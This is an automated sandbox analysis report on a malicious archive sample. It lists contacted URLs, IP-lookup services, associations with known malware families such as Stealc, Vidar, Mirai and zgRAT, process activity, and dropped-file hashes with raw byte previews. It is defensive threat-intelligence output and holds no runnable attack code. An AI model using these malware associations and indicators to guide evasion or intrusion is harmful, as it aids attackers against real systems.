https://nuget.org/nuget.exe | powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ipinfo.io/json | svchost.exe, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, x338625.dat.31.dr, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.bingmapsportal.com | svchost.exe, 00000009.00000002.1368820099.000001DEFEA13000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.gnu.org/licenses/ | svchost.exe, 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp, libintl-9.dll.31.dr, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://curl.se/docs/http-cookies.html | console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000022.00000002.1899492113.000001C7C0D11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000009.00000003.1368418759.000001DEFEA32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gnu.org/licenses/ | svchost.exe, 0000002E.00000002.2329342995.00000000660F4000.00000008.00000001.01000000.0000001D.sdmp, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | svchost.exe, 00000009.00000003.1368214670.000001DEFEA5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://g.live.com/odclientsettings/ProdV2/C: | svchost.exe, 00000003.00000003.1202792782.00000150FC750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000009.00000003.1368338734.000001DEFEA4C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
https://curl.se/docs/copyright.htmlD | console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod/C: | edb.log.3.dr | false | URL Reputation: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://worldtimeapi.org/api/timezone/Etc/UTCnB | console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zlib.net/ | console_zero.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dynamic.t | svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mingw-w64.sourceforge.net/X | svchost.exe, 0000002E.00000002.2306483829.0000000064953000.00000008.00000001.01000000.0000001C.sdmp, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://curl.se/docs/copyright.html | console_zero.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://www.zlib.net/D | console_zero.exe, 00000033.00000002.2226412628.00007FFA51137000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.openssl.org/H | svchost.exe, 0000002E.00000002.2388271854.00007FFA2CEE1000.00000002.00000001.01000000.00000018.sdmp, svchost.exe, 0000002E.00000002.2383458007.00007FFA244AE000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, libssl-3-x64.dll.31.dr, usvc.dat.31.dr | false | URL Reputation: safe | unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain; | console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe.31.dr, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://curl.se/docs/http-cookies.html# | console_zero.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://curl.se/V | console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
213.188.196.246 | worldtimeapi.org | Italy | 25400 | TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | false
34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
20.71.50.126 | universalsqlserver.privatelink.postgres.database.azure.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
      IP
      127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1501605
Start date and time: 2024-08-30 07:38:19 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 67
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: F.7z
Detection: MAL
Classification: mal100.expl.evad.win7Z@86/50@3/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
• Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, WmiPrvSE.exe, TextInputHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, e16604.g.akamaiedge.net, evoke-windowsservices-tas.msedge.net, settings-win.data.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target console_zero.exe, PID 3276, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:38:49 | API Interceptor | 1x Sleep call for process: OpenWith.exe modified
01:39:05 | API Interceptor | 3x Sleep call for process: svchost.exe modified
01:40:11 | API Interceptor | 88x Sleep call for process: powershell.exe modified
01:40:13 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
01:40:22 | API Interceptor | 1x Sleep call for process: explorer.exe modified
01:40:45 | API Interceptor | 1x Sleep call for process: console_zero.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
213.188.196.246 | Incident_Report_Harassment_by_Employee.doc | malicious | Unknown | /api/ip
213.188.196.246 | out.exe | malicious | Unknown | /api/ip
213.188.196.246 | out.exe | malicious | Unknown | /api/ip
213.188.196.246 | potrgssavalue.msi | malicious | Unknown | /api/ip
213.188.196.246 | down.dll | malicious | Unknown | /api/ip
213.188.196.246 | down.dll | malicious | Unknown | /api/ip
213.188.196.246 | crypted.bin.exe | malicious | CryptOne | /api/ip
213.188.196.246 | crypted.bin.exe | malicious | CryptOne | /api/ip
34.117.59.81 | mekotio_xoredps1.ps1 | malicious | Unknown | ipinfo.io/json
34.117.59.81 | DevolucionImpuestoJulioTGR.cmd_BQVDQNuQQAGG.cmd | malicious | Unknown | ipinfo.io/json
34.117.59.81 | mek_n_bat.bat | malicious | Unknown | ipinfo.io/json
34.117.59.81 | QMe7JpPtde.exe | malicious | Unknown | ipinfo.io/json
34.117.59.81 | z30PO1028930.exe | malicious | AsyncRAT, StormKitty, VenomRAT | ipinfo.io/ip
34.117.59.81 | SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exe | malicious | Unknown | ipinfo.io/ip
34.117.59.81 | SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exe | malicious | Unknown | ipinfo.io/ip
34.117.59.81 | IP-Grabber.ps1 | malicious | Unknown | ipinfo.io/ip
34.117.59.81 | BadUsb.ps1 | malicious | Unknown | ipinfo.io/ip
34.117.59.81 | ZmYfQBiw.exe | malicious | Unknown | ipinfo.io/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ipinfo.io | gHPYUEh253.exe | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | 34.117.59.81
ipinfo.io | kqS23MOytx.exe | malicious | Socks5Systemz, Stealc, Vidar, XWorm, Xmrig | 34.117.59.81
ipinfo.io | i3F8zuP3u9.exe | malicious | DCRat, PureLog Stealer, zgRAT | 34.117.59.81
ipinfo.io | Z66MsXpleT.exe | malicious | LummaC, Stealc, Vidar | 34.117.59.81
ipinfo.io | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar | 34.117.59.81
ipinfo.io | IDM_ACT.exe | malicious | Fredy Stealer | 34.117.59.81
ipinfo.io | https://sesh-gangrene.shop/ | malicious | HTMLPhisher | 34.117.59.81
ipinfo.io | IDM_ACT.exe | malicious | Fredy Stealer | 34.117.59.81
ipinfo.io | iBO7gzlZr3.exe | malicious | LummaC | 34.117.59.81
ipinfo.io | trkfmve.exe | malicious | DCRat, PureLog Stealer, zgRAT | 34.117.59.81
worldtimeapi.org | exe4.bin.bak.exe | malicious | BlackMoon, GhostRat | 213.188.196.246
worldtimeapi.org | https://troy-acoustics.neetoform.com/25d7349ac44d8bc00661 | malicious | Phisher | 213.188.196.246
worldtimeapi.org | 4LAYhwU8S0.exe | malicious | Cash Ransomware, PureLog Stealer, TrojanRansom, zgRAT | 213.188.196.246
worldtimeapi.org | 4LAYhwU8S0.exe | malicious | Cash Ransomware, PureLog Stealer, TrojanRansom, zgRAT | 213.188.196.246
worldtimeapi.org | CashKamera.exe | malicious | Cash Ransomware, PureLog Stealer, TrojanRansom, zgRAT | 213.188.196.246
worldtimeapi.org | Nvidia.exe | malicious | Cash Ransomware, PureLog Stealer, TrojanRansom, zgRAT | 213.188.196.246
worldtimeapi.org | zune.exe | malicious | Cash Ransomware, PureLog Stealer, TrojanRansom, zgRAT | 213.188.196.246
worldtimeapi.org | C_RAAS.exe | malicious | Cash Ransomware, PureLog Stealer, TrojanRansom, zgRAT | 213.188.196.246
worldtimeapi.org | MicroSIP.exe | malicious | Cash Ransomware, PureLog Stealer, TrojanRansom, zgRAT | 213.188.196.246
worldtimeapi.org | CashRansomware.exe | malicious | PureLog Stealer, TrojanRansom, zgRAT | 213.188.196.246
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | sora.mpsl.elf | malicious | Mirai | 146.225.111.184
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | sora.sh4.elf | malicious | Unknown | 146.242.216.87
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | firmware.mips.elf | malicious | Unknown | 194.43.246.10
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | firmware.armv4l.elf | malicious | Unknown | 152.93.255.140
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | jew.arm7.elf | malicious | Mirai | 139.145.68.35
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | 154.216.18.223-mips-2024-08-17T03_44_00.elf | malicious | Mirai | 213.225.83.142
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | SecuriteInfo.com.Linux.Siggen.9999.23751.27873.elf | malicious | Mirai | 194.43.6.233
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | hoho.x86.elf | malicious | Mirai | 146.240.126.137
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | mpsl.elf | malicious | Mirai | 85.19.102.190
TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO | sora.spc.elf | malicious | Mirai | 139.145.253.228
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | Unknown | 13.107.246.57
MICROSOFT-CORP-MSN-AS-BLOCKUS | sora.arm7.elf | malicious | Mirai | 20.169.237.51
MICROSOFT-CORP-MSN-AS-BLOCKUS | sora.mips.elf | malicious | Mirai | 72.152.158.255
MICROSOFT-CORP-MSN-AS-BLOCKUS | sora.ppc.elf | malicious | Unknown | 20.251.99.83
MICROSOFT-CORP-MSN-AS-BLOCKUS | sora.sh4.elf | malicious | Mirai | 72.153.3.164
MICROSOFT-CORP-MSN-AS-BLOCKUS | sora.spc.elf | malicious | Mirai | 20.213.16.242
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | Unknown | 13.107.246.67
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://www.bettercaremarket.com.au/pill-bottle-opener-with-magnifier-aidapt.html?comet_source=google&comet_network=x&comet_campaign=20867905123&comet_ad_group=&comet_ad_id=&comet_keyword=&comet_type=smart&gad_source=1&gclid=EAIaIQobChMIqcj6sY-ZhwMV5tgWBR0YswpVEAQYASABEgJi9fD_BwE | malicious | Unknown | 150.171.27.10
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | Unknown | 13.107.246.60
MICROSOFT-CORP-MSN-AS-BLOCKUS | file.exe | malicious | Unknown | 13.107.246.64
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | gHPYUEh253.exe | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | 34.117.59.81
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | kqS23MOytx.exe | malicious | Socks5Systemz, Stealc, Vidar, XWorm, Xmrig | 34.117.59.81
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | i3F8zuP3u9.exe | malicious | DCRat, PureLog Stealer, zgRAT |
      • 34.117.59.81
      https://daehwa.info/uploaded/file/71677108868.pdfGet hashmaliciousPDFPhishBrowse
      • 34.117.39.58
      https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
      • 34.117.39.58
      Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 34.117.59.81
      eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      https://sesh-gangrene.shop/Get hashmaliciousHTMLPhisherBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      bd0bf25947d4a37404f0424edf4db9adIDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      IDMCRK.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      IDMCRK.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      file.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      file.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Windows\System32\libcrypto-3-x64.dllLd0f3NDosJ.exeGet hashmaliciousUnknownBrowse
        C:\Windows \System32\printui.exeLd0f3NDosJ.exeGet hashmaliciousUnknownBrowse
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):1310720
          Entropy (8bit):0.40702962548832927
          Encrypted:false
          SSDEEP:1536:fJeHJFZnnJF9U7JFCRImvqnDskXZrtlpZpaSh5hmn91nzw7LkL4b2bBbP+GCFH+W:fJyyWGWnzwHkL4WLnQnHZ
          MD5:759D35E63ABC448E4ADA337F8674D7F7
          SHA1:D7A7591FDF7AD5DB80780B1A49055C2D83799849
          SHA-256:93A10283D882C0FB2E06794998DD93203370BD413A230E1606293B5DE31C548B
          SHA-512:2A251CB073476CACC971C6A06FB158D77D1A702FE6C8921B6040C7F5FFEE37066F587F88780C10558EC2AEB4F969F70E032A2EC3AB5326110AC2CDB18ADDAF78
          Malicious:false
          Preview:.B..........@..@ /...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................%.O._..r.#.........`h.................h...............X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
          Process:C:\Windows\System32\svchost.exe
          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb5c00497, page size 16384, DirtyShutdown, Windows version 10.0
          Category:dropped
          Size (bytes):1310720
          Entropy (8bit):0.5145140919453204
          Encrypted:false
          SSDEEP:1536:FSB2ESB2SSjlK/av9qn5hbkL4ShyUqn/qnJKYkr3g16HL2UPkLk+kY07Q8zAkUk4:Fazakv+hkL4c2L2ULz
          MD5:02121134C8C7C9C10BE7245F6110C6C3
          SHA1:F47592F6A7983FCF6A765A70DC63F3D28FE6BEAA
          SHA-256:F94CD8E90C3E798646ADE952B33568BB10B84F00809D8A618F1B1DEDE2FAB242
          SHA-512:69A0B6408E19476DCAE7EC480A937C28E393BD356AA87B7FB439777EC94203B2841D3BD32CCB587FF49232EE67934F9D079DF5EBDDA0092AC01B4498B1EDF2BB
          Malicious:false
          Preview:....... ...............X\...;...{......................0.9..........{...'...|C.h.;.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ....... /...{...............................................................................................................................................................................................2...{..................................$.JT.'...|CF................0..'...|C..........................#......h.;.....................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):0.07847143481205551
          Encrypted:false
          SSDEEP:3:U/l/KYeXjlYljll/UWjHrJjOqHvjvJ+tZ8//lollx8m9v/ll/TnK2:Ut/KzXjlYljllnjHrJj7jBCImlLK
          MD5:FB2129F90B14268C2668B2F9123AE595
          SHA1:F4E05812D00F6038055D07491D4C174830EFEF85
          SHA-256:AC77B88F0334BACE1D5F2A39E0B14E4D6199A5265F8EF9049A24F4FDFE08FA04
          SHA-512:B7A2EF319736BD7B2DC0ADB02D41603D2B0A86F9718B1DE39678102EA4AFDA9B0EFDB4592117A2C20C0954B3B975FA44AA3328BB2FD96F70328F490D5CB24825
          Malicious:false
          Preview:...Y.....................................;...{...'...|C......{...............{.......{..8. u.....{.&................0..'...|C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):1.1993388261293731
          Encrypted:false
          SSDEEP:12:BlmjqPqF69Fq5DZ4STk56GWtbgjO3s7Nxk56GtGj4txnmlNlmN:BAc1q4eGtm2jGtEs6NAN
          MD5:A3B43076C089F038A5B74409FC1442BE
          SHA1:CA4D8BCC4F1DA7E4E2F7E38F8F70790AFAC2C618
          SHA-256:174BD747F1F546A74FC7A5670CC4E8943A4A2CD901684B39986A07E43C7722CF
          SHA-512:60994934AD52E042D2958DD102E35F5E2E7D66D66C1F07E320BB917B8250D174591D031F0C566A409021BE4292AEF5E99576AD5FCAE856992A7688FA4C80D15A
          Malicious:false
          Preview:............................................................................D...x........=.....................eJ..............Zb..K....(......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................0.!..Y...........=.............U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.S.y.s.t.e.m.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...0.b.1.8.7.b.6.0.-.e.d.6.a.-.4.5.3.b.-.9.a.f.f.-.e.d.a.3.b.8.5.b.7.0.3.5...1...e.t.l...........P.P.x........=.....................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:modified
          Size (bytes):20868
          Entropy (8bit):5.609193197692224
          Encrypted:false
          SSDEEP:384:7yBrkgXazJpXfKXhr7FrYE4MvRnSsT9MQw/GwLbzd/dEbJPTBqd:ur7a1gXhr1rRSm9ReHdObJNqd
          MD5:48466C8F35A61EF0961EEDB36E0DE609
          SHA1:D00891C5D947B31F8A220853FA0430F450624701
          SHA-256:6F5E787D27C9F7DE7B6B324CF29DC4F6926059DF4BE220C138461B21F6F57517
          SHA-512:F93598B1075704367E5079A55CC4367FF097CB440F99838CD906259AE5FFC039DACC794E0843FEBDD35028D5B87D6C5A821AE446DB5C4A43693CACC3505C5828
          Malicious:false
